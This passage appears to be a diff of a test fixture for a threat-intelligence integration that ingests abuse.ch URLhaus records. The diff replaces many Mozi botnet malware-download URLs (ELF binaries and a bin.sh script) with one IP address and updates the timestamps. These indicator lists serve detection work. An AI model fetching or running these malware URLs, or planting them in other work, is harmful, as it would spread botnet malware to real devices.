"{\"id\":\"961320\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961320/\",\"url\":\"http://89.160.20.156:32823/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -10966,18 +10966,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://101.20.171.255:44103/Mozi.a", + "original": "http://89.160.20.156:44103/Mozi.a", "scheme": "http", "port": 44103, - "domain": "101.20.171.255", - "full": "http://101.20.171.255:44103/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44103/Mozi.a" }, - "ip": "101.20.171.255" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693358371Z", - "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://101.20.171.255:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"101.20.171.255\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026118300Z", + "original": "{\"id\":\"961318\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961318/\",\"url\":\"http://89.160.20.156:44103/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11015,18 +11015,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.211.62.72:36257/Mozi.m", + "original": "http://89.160.20.156:36257/Mozi.m", "scheme": "http", "port": 36257, - "domain": "117.211.62.72", - "full": "http://117.211.62.72:36257/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36257/Mozi.m" }, - "ip": "117.211.62.72" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693361557Z", - "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://117.211.62.72:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.211.62.72\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026125200Z", + "original": "{\"id\":\"961319\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961319/\",\"url\":\"http://89.160.20.156:36257/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:49:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -11065,18 +11065,18 @@
 "url": {
 "path": "/bin.sh",
 "extension": "sh",
- "original": "http://115.55.179.98:41921/bin.sh",
+ "original": "http://89.160.20.156:41921/bin.sh",
 "scheme": "http",
 "port": 41921,
- "domain": "115.55.179.98",
- "full": "http://115.55.179.98:41921/bin.sh"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:41921/bin.sh"
 },
- "ip": "115.55.179.98"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693365415Z",
- "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://115.55.179.98:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"115.55.179.98\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.026132200Z",
+ "original": "{\"id\":\"961317\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961317/\",\"url\":\"http://89.160.20.156:41921/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:45:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11114,18 +11114,18 @@
 "provider": "geenensp",
 "url": {
 "path": "/i",
- "original": "http://182.113.226.63:50971/i",
+ "original": "http://89.160.20.156:50971/i",
 "scheme": "http",
 "port": 50971,
- "domain": "182.113.226.63",
- "full": "http://182.113.226.63:50971/i"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:50971/i"
 },
- "ip": "182.113.226.63"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693368571Z",
- "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://182.113.226.63:50971/i\",\"url_status\":\"online\",\"host\":\"182.113.226.63\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
+ "ingested": "2021-12-13T08:40:08.026170200Z",
+ "original": "{\"id\":\"961316\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961316/\",\"url\":\"http://89.160.20.156:50971/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:44:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11163,18 +11163,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.96.39.120:56339/Mozi.m",
+ "original": "http://89.160.20.156:56339/Mozi.m",
 "scheme": "http",
 "port": 56339,
- "domain": "59.96.39.120",
- "full": "http://59.96.39.120:56339/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:56339/Mozi.m"
 },
- "ip": "59.96.39.120"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693379221Z",
- "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://59.96.39.120:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.39.120\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026178200Z",
+ "original": "{\"id\":\"961315\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961315/\",\"url\":\"http://89.160.20.156:56339/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11212,18 +11212,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://221.15.198.146:52551/Mozi.m",
+ "original": "http://89.160.20.156:52551/Mozi.m",
 "scheme": "http",
 "port": 52551,
- "domain": "221.15.198.146",
- "full": "http://221.15.198.146:52551/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:52551/Mozi.m"
 },
- "ip": "221.15.198.146"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693385653Z",
- "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://221.15.198.146:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.15.198.146\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026185200Z",
+ "original": "{\"id\":\"961314\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961314/\",\"url\":\"http://89.160.20.156:52551/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11261,18 +11261,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://182.126.93.114:35942/Mozi.m",
+ "original": "http://89.160.20.156:35942/Mozi.m",
 "scheme": "http",
 "port": 35942,
- "domain": "182.126.93.114",
- "full": "http://182.126.93.114:35942/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:35942/Mozi.m"
 },
- "ip": "182.126.93.114"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693390542Z",
- "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://182.126.93.114:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.93.114\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026192200Z",
+ "original": "{\"id\":\"961312\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961312/\",\"url\":\"http://89.160.20.156:35942/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11310,18 +11310,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://188.19.182.164:39636/Mozi.a",
+ "original": "http://89.160.20.156:39636/Mozi.a",
 "scheme": "http",
 "port": 39636,
- "domain": "188.19.182.164",
- "full": "http://188.19.182.164:39636/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:39636/Mozi.a"
 },
- "ip": "188.19.182.164"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693394319Z",
- "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://188.19.182.164:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"188.19.182.164\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026199100Z",
+ "original": "{\"id\":\"961313\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961313/\",\"url\":\"http://89.160.20.156:39636/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11359,18 +11359,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://59.0.6.131:53548/Mozi.m",
+ "original": "http://89.160.20.156:53548/Mozi.m",
 "scheme": "http",
 "port": 53548,
- "domain": "59.0.6.131",
- "full": "http://59.0.6.131:53548/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:53548/Mozi.m"
 },
- "ip": "59.0.6.131"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693397846Z",
- "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://59.0.6.131:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.0.6.131\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026205900Z",
+ "original": "{\"id\":\"961310\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961310/\",\"url\":\"http://89.160.20.156:53548/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11408,18 +11408,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://45.160.145.247:40967/Mozi.m",
+ "original": "http://89.160.20.156:40967/Mozi.m",
 "scheme": "http",
 "port": 40967,
- "domain": "45.160.145.247",
- "full": "http://45.160.145.247:40967/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:40967/Mozi.m"
 },
- "ip": "45.160.145.247"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693401042Z",
- "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://45.160.145.247:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"45.160.145.247\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026212900Z",
+ "original": "{\"id\":\"961311\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961311/\",\"url\":\"http://89.160.20.156:40967/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11457,18 +11457,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://186.33.104.195:49471/Mozi.m",
+ "original": "http://89.160.20.156:49471/Mozi.m",
 "scheme": "http",
 "port": 49471,
- "domain": "186.33.104.195",
- "full": "http://186.33.104.195:49471/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49471/Mozi.m"
 },
- "ip": "186.33.104.195"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693404127Z",
- "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://186.33.104.195:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.195\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026219700Z",
+ "original": "{\"id\":\"961309\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961309/\",\"url\":\"http://89.160.20.156:49471/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11506,18 +11506,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://42.224.172.5:43937/Mozi.m",
+ "original": "http://89.160.20.156:43937/Mozi.m",
 "scheme": "http",
 "port": 43937,
- "domain": "42.224.172.5",
- "full": "http://42.224.172.5:43937/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43937/Mozi.m"
 },
- "ip": "42.224.172.5"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693407474Z",
- "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://42.224.172.5:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.172.5\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026226500Z",
+ "original": "{\"id\":\"961302\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961302/\",\"url\":\"http://89.160.20.156:43937/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11555,18 +11555,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://182.126.89.215:57992/Mozi.a",
+ "original": "http://89.160.20.156:57992/Mozi.a",
 "scheme": "http",
 "port": 57992,
- "domain": "182.126.89.215",
- "full": "http://182.126.89.215:57992/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:57992/Mozi.a"
 },
- "ip": "182.126.89.215"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693410870Z",
- "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://182.126.89.215:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.126.89.215\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026233400Z",
+ "original": "{\"id\":\"961303\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961303/\",\"url\":\"http://89.160.20.156:57992/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11604,18 +11604,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://27.219.111.198:43603/Mozi.m",
+ "original": "http://89.160.20.156:43603/Mozi.m",
 "scheme": "http",
 "port": 43603,
- "domain": "27.219.111.198",
- "full": "http://27.219.111.198:43603/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:43603/Mozi.m"
 },
- "ip": "27.219.111.198"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693414256Z",
- "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://27.219.111.198:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"27.219.111.198\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026240400Z",
+ "original": "{\"id\":\"961304\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961304/\",\"url\":\"http://89.160.20.156:43603/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11653,18 +11653,18 @@
 "url": {
 "path": "/Mozi.a",
 "extension": "a",
- "original": "http://27.219.76.18:37157/Mozi.a",
+ "original": "http://89.160.20.156:37157/Mozi.a",
 "scheme": "http",
 "port": 37157,
- "domain": "27.219.76.18",
- "full": "http://27.219.76.18:37157/Mozi.a"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37157/Mozi.a"
 },
- "ip": "27.219.76.18"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693417503Z",
- "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://27.219.76.18:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.219.76.18\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026247200Z",
+ "original": "{\"id\":\"961305\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961305/\",\"url\":\"http://89.160.20.156:37157/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11702,18 +11702,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://185.246.178.200:37229/Mozi.m",
+ "original": "http://89.160.20.156:37229/Mozi.m",
 "scheme": "http",
 "port": 37229,
- "domain": "185.246.178.200",
- "full": "http://185.246.178.200:37229/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:37229/Mozi.m"
 },
- "ip": "185.246.178.200"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693420729Z",
- "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://185.246.178.200:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"185.246.178.200\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026254200Z",
+ "original": "{\"id\":\"961306\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961306/\",\"url\":\"http://89.160.20.156:37229/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11751,18 +11751,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://222.136.88.171:49104/Mozi.m",
+ "original": "http://89.160.20.156:49104/Mozi.m",
 "scheme": "http",
 "port": 49104,
- "domain": "222.136.88.171",
- "full": "http://222.136.88.171:49104/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49104/Mozi.m"
 },
- "ip": "222.136.88.171"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693424395Z",
- "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://222.136.88.171:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.136.88.171\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026261400Z",
+ "original": "{\"id\":\"961307\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961307/\",\"url\":\"http://89.160.20.156:49104/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -11800,18 +11800,18 @@
 "url": {
 "path": "/Mozi.m",
 "extension": "m",
- "original": "http://61.53.193.78:49575/Mozi.m",
+ "original": "http://89.160.20.156:49575/Mozi.m",
 "scheme": "http",
 "port": 49575,
- "domain": "61.53.193.78",
- "full": "http://61.53.193.78:49575/Mozi.m"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156:49575/Mozi.m"
 },
- "ip": "61.53.193.78"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T06:08:08.693427702Z",
- "original": "{\"id\":\"961308\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961308/\",\"url\":\"http://61.53.193.78:49575/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.53.193.78\",\"date_added\":\"2021-01-14 19:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}",
+ "ingested": "2021-12-13T08:40:08.026268400Z",
